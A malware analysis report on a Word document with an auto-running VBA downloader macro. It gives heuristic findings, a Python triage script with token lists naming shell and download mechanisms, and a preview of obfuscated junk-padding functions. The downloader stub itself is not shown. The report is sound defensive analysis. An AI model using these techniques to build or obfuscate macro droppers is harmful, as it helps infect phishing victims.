Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file contains a VBA project with an AutoOpen procedure, so the macro runs as soon as the document is opened in Word with macros enabled. Heuristics also flag a CreateObject call, the usual way a macro instantiates an object such as WScript.Shell or an XMLHTTP client to launch or fetch a payload. ClamAV's detection as Doc.Macro.VBSDownloader-6336817-0 indicates the macro's purpose is to download and execute a second stage. The extracted source is heavily obfuscated: the visible portion consists of filler functions with random names that declare an array, scatter numeric literals and undefined identifiers into it, and then loop over a range, and in several of them the loop bounds are reversed (for example `For fuLuSrVUUa = 7807 To 7482`), so the loop never iterates. The AutoOpen and CreateObject logic sits beyond the truncated preview, so the visible code is padding around a downloader stub rather than the stub itself.
Heuristics (7)
| Finding | Severity | Rule | Description |
|---|---|---|---|
| ClamAV: Doc.Macro.VBSDownloader-6336817-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML schema namespace that Office writes into ordinary documents, not a download or contact indicator. |
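The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above and the insights paragraph both rest on the same test: an auto-execution entry point combined with a shell/download/object-execution token. The script below is an added example for this report, not the analyzer's or oletools' own code; it applies that rule to decoded VBA source text (the kind olevba produces for macros.bas) and additionally counts the filler functions and never-iterating loops that characterize the preview. The embedded sample is constructed for the test: the two padding functions are abbreviated from the preview, while the `AutoOpen` body is a placeholder, because the sample's real AutoOpen is outside the truncated preview and is not known from this page.

```python
"""Triage decoded VBA source for auto-exec entry points, execution tokens and junk padding.

Added example for this report (not the analyzer's code). Works on text olevba already
decoded, so it needs no oletools dependency.
"""
import re
from dataclasses import dataclass, field

# Entry points Word/Excel run without user interaction (VBA names are case-insensitive).
AUTO_EXEC = ("autoopen", "auto_open", "document_open", "autoexec", "workbook_open",
             "autoclose", "document_close")
# Tokens that launch a process, fetch a payload or instantiate a COM object.
EXEC_TOKENS = ("createobject", "getobject", "shell", "wscript.shell", "xmlhttp",
               "winhttprequest", "urldownloadtofile", "adodb.stream", "powershell", "msxml2")

FUNC_START = re.compile(r"^\s*(?:public\s+|private\s+)?(?:function|sub)\s+(\w+)", re.I)
FUNC_END = re.compile(r"^\s*end\s+(?:function|sub)\b", re.I)
FOR_LOOP = re.compile(r"^\s*for\s+\w+\s*=\s*(-?\d+)\s+to\s+(-?\d+)\b", re.I)

# Statement shapes that make up the padding functions in the preview: declare an
# array, resize it, poke literals or bare identifiers into cells, loop over cells.
JUNK_STMT = re.compile(
    r"^\s*(?:dim\s+\w+\(\)"
    r"|redim\s+\w+\(\d+\)"
    r"|\w+\s*=\s*\d+"
    r"|\w+\(\w+\)\s*=\s*\w+"
    r"|for\s+\w+\s*=\s*-?\d+\s+to\s+-?\d+"
    r"|next)\s*$", re.I)


@dataclass
class Function:
    name: str
    body: list = field(default_factory=list)


@dataclass
class Triage:
    auto_exec: list        # auto-execution procedures found
    exec_tokens: dict      # procedure name -> execution/download tokens seen in it
    junk_functions: list   # procedures that only fill an array and loop over it
    dead_loops: int        # For loops whose start bound exceeds the end: never iterate
    verdict: str


def split_functions(src: str) -> list:
    """Cut VBA source into Function/Sub blocks; Attribute lines outside them are ignored."""
    funcs, current = [], None
    for line in src.splitlines():
        start = FUNC_START.match(line)
        if start and current is None:
            current = Function(start.group(1))
        elif FUNC_END.match(line) and current is not None:
            funcs.append(current)
            current = None
        elif current is not None and line.strip():
            current.body.append(line)
    return funcs


def is_junk(fn: Function) -> bool:
    """Padding: every statement is an array-fill/loop shape and nothing is called."""
    return bool(fn.body) and all(JUNK_STMT.match(line) for line in fn.body)


def count_dead_loops(fn: Function) -> int:
    dead = 0
    for line in fn.body:
        m = FOR_LOOP.match(line)
        if m and int(m.group(1)) > int(m.group(2)):  # default Step is +1, so this never runs
            dead += 1
    return dead


def triage(src: str) -> Triage:
    funcs = split_functions(src)
    auto = [f.name for f in funcs if f.name.lower() in AUTO_EXEC]
    tokens = {}
    for f in funcs:
        low = "\n".join(f.body).lower()
        hits = [t for t in EXEC_TOKENS if t in low]
        if hits:
            tokens[f.name] = hits
    junk = [f.name for f in funcs if is_junk(f)]
    dead = sum(count_dead_loops(f) for f in funcs)
    # Same rule as the report's p-code heuristic: auto-exec entry plus execution token.
    if auto and tokens:
        verdict = "auto-exec + execution token: likely downloader/dropper"
    elif auto or tokens:
        verdict = "suspicious: review manually"
    else:
        verdict = "no macro execution indicators"
    return Triage(auto, tokens, junk, dead, verdict)


# Constructed input: two padding functions abbreviated from the preview, plus a
# placeholder AutoOpen (the real one is not shown on the report page).
SAMPLE_VBA = """Attribute VB_Name = "Module1"
Function EEsGPrGzGA()
Dim DDgYyyGgwf()
BYFvAYLZLDs = 6174
ReDim DDgYyyGgwf(6174)
DDgYyyGgwf(3303) = GWHtzCVyW
DDgYyyGgwf(5383) = 2945
For BYFvAYLZLDs = 579 To 731
DDgYyyGgwf(BYFvAYLZLDs) = BYFvAYLZLDs
Next
End Function
Function yEUgfsym()
Dim vcAnWCGCBmg()
ReDim vcAnWCGCBmg(8472)
vcAnWCGCBmg(185) = 7751
For fuLuSrVUUa = 7807 To 7482
vcAnWCGCBmg(fuLuSrVUUa) = fuLuSrVUUa
Next
End Function
Sub AutoOpen()
' Constructed placeholder body, not the sample's real AutoOpen.
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c echo constructed", 0
End Sub
"""

if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print(f"auto-exec: {result.auto_exec}")
    print(f"exec tokens: {result.exec_tokens}")
    print(f"junk functions: {len(result.junk_functions)}, dead loops: {result.dead_loops}")
    print(f"verdict: {result.verdict}")
```

Run it against the full macros.bas artifact (`triage(open("macros.bas").read())`) to see how much of the 10966 bytes is padding versus live code; a high junk-function count with a single non-junk procedure is the shape of a stub whose real work is in the one function the filler hides. Because the script works on decoded source, it is a complement to, not a replacement for, the p-code check, which still fires when source extraction fails.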
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10966 bytes | 86d8de6fee6be16e7e3a1e582304906d184749b82eed08e5b071dd31400f740a |

Preview script (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function EEsGPrGzGA()
Dim DDgYyyGgwf()
BYFvAYLZLDs = 6174
ReDim DDgYyyGgwf(6174)
DDgYyyGgwf(3303) = GWHtzCVyW
DDgYyyGgwf(1152) = kmMwVpBBT
DDgYyyGgwf(6006) = BTvubsUSG
DDgYyyGgwf(5383) = 2945
DDgYyyGgwf(782) = 2554
DDgYyyGgwf(2616) = 4584
For BYFvAYLZLDs = 579 To 731
DDgYyyGgwf(BYFvAYLZLDs) = BYFvAYLZLDs
Next
End Function
Function yEUgfsym()
Dim vcAnWCGCBmg()
fuLuSrVUUa = 8472
ReDim vcAnWCGCBmg(8472)
vcAnWCGCBmg(3740) = nHywntcn
vcAnWCGCBmg(4379) = SGweBgSy
vcAnWCGCBmg(6777) = eHfFRwHy
vcAnWCGCBmg(1412) = EZMaUvCk
vcAnWCGCBmg(3043) = KAuNUcmNY
vcAnWCGCBmg(185) = 7751
vcAnWCGCBmg(5431) = 8624
For fuLuSrVUUa = 7807 To 7482
vcAnWCGCBmg(fuLuSrVUUa) = fuLuSrVUUa
Next
End Function
Function CkDeaxfuxhb()
Dim hnuVfKywKm()
tuueNuzDKYE = 1921
ReDim hnuVfKywKm(1921)
hnuVfKywKm(188) = fHzDSwDhf
hnuVfKywKm(1690) = bkdyVburM
hnuVfKywKm(404) = 2034
hnuVfKywKm(968) = 5676
hnuVfKywKm(234) = 3584
hnuVfKywKm(1854) = 3365
hnuVfKywKm(1193) = 4399
hnuVfKywKm(1039) = 4191
For tuueNuzDKYE = 1263 To 450
hnuVfKywKm(tuueNuzDKYE) = tuueNuzDKYE
Next
End Function
Function BgLWARLL()
Dim GdBzEShWPCF()
uvgHwuAYn = 3708
ReDim GdBzEShWPCF(3708)
GdBzEShWPCF(2785) = KUYLvyfVZ
GdBzEShWPCF(861) = MxXzaUxBw
GdBzEShWPCF(3583) = HeaZPTWL
GdBzEShWPCF(3305) = EUhRxVuDhz
GdBzEShWPCF(1395) = LErRPFPZeCP
GdBzEShWPCF(928) = MKzkvRLtu
GdBzEShWPCF(3504) = 6445
GdBzEShWPCF(1938) = 5142
GdBzEShWPCF(2253) = 2246
GdBzEShWPCF(1111) = 6950
For uvgHwuAYn = 1726 To 1247
GdBzEShWPCF(uvgHwuAYn) = uvgHwuAYn
Next
End Function
Function yYdvPYXe()
Dim VeHAcCHvEd()
FZTbnZNKguC = 7067
ReDim VeHAcCHvEd(7067)
VeHAcCHvEd(6593) = CsekaPFCM
VeHAcCHvEd(6177) = ZLPysZfKX
VeHAcCHvEd(235) = 3322
VeHAcCHvEd(727) = 7278
VeHAcCHvEd(4782) = 199
VeHAcCHvEd(2783) = 841
VeHAcCHvEd(3404) = 7082
For FZTbnZNKguC = 5496 To 78
VeHAcCHvEd(FZTbnZNKguC) = FZTbnZNKguC
Next
End Function
Function CBhuzABgN()
Dim CUZEfUFeSr()
baUpCttvh = 7139
ReDim CUZEfUFeSr(7139)
CUZEfUFeSr(3594) = bbNSWgbGETv
CUZEfUFeSr(5014) = HtxsswHba
CUZEfUFeSr(3216) = sEAHZpPCh
CUZEfUFeSr(1481) = MVktruwdZvx
CUZEfUFeSr(4760) = SVFUMgdcp
CUZEfUFeSr(5330) = UtTxfcVsFUK
CUZEfUFeSr(3033) = 3757
CUZEfUFeSr(2312) = 2198
CUZEfUFeSr(2085) = 3091
CUZEfUFeSr(5636) = 2251
CUZEfUFeSr(6159) = 8791
CUZEfUFeSr(2124) = 4982
For baUpCttvh = 2172 To 5921
CUZEfUFeSr(baUpCttvh) = baUpCttvh
Next
End Function
Function FGPPhKKx()
Dim eWnYwLkK()
DprwfwPA = 6904
ReDim eWnYwLkK(6904)
eWnYwLkK(5942) = WkGfWkTmbgU
eWnYwLkK(800) = AnARdbSG
eWnYwLkK(732) = 2484
eWnYwLkK(5243) = 9155
eWnYwLkK(3221) = 2378
eWnYwLkK(1416) = 2223
eWnYwLkK(4954) = 3753
For DprwfwPA = 307 To 4425
eWnYwLkK(DprwfwPA) = DprwfwPA
Next
End Function
Function YvtywTsWrDG()
Dim dENDeMmW()
eMWdSXWPa = 8375
ReDim dENDeMmW(8375)
dENDeMmW(1395) = tDWSVtue
dENDeMmW(2763) = KvTYPpfp
dENDeMmW(2177) = aWwZRCkvc
dENDeMmW(6809) = 8316
dENDeMmW(3899) = 1515
dENDeMmW(3180) = 7715
dENDeMmW(795) = 2004
dENDeMmW(149) = 3841
dENDeMmW(8003) = 3925
For eMWdSXWPa = 3546 To 1756
dENDeMmW(eMWdSXWPa) = eMWdSXWPa
Next
End Function
Function DcuxXcRY()
Dim LUXZkUhp()
LvktrFZdS = 9840
ReDim LUXZkUhp(9840)
LUXZkUhp(1935) = fdZsFHpyp
LUXZkUhp(76) = ZSYmyXnd
LUXZkUhp(166) = XcwtzWBuDfG
LUXZkUhp(2494) = 4463
LUXZkUhp(9092) = 3608
LUXZkUhp(4041) = 6716
LUXZkUhp(6841) = 8087
For LvktrFZdS = 4421 To 1967
LUXZkUhp(LvktrFZdS) = LvktrFZdS
Next
End Function
Function pWeyaNTDFKK()
Dim sLvApCnesEf()
YDDsLVHT = 338
ReDim sLvApCnesEf(338)
sLvApCnesEf(99) = ASzpcXZB
sLvApCnesEf(177) = ECpTkMPYTT
sLvApCnesEf(122) = KuLhMhvn
sLvApCnesEf(140) = TFSdEwnrg
sLvApCnesEf(229) = ARC ... (truncated)
```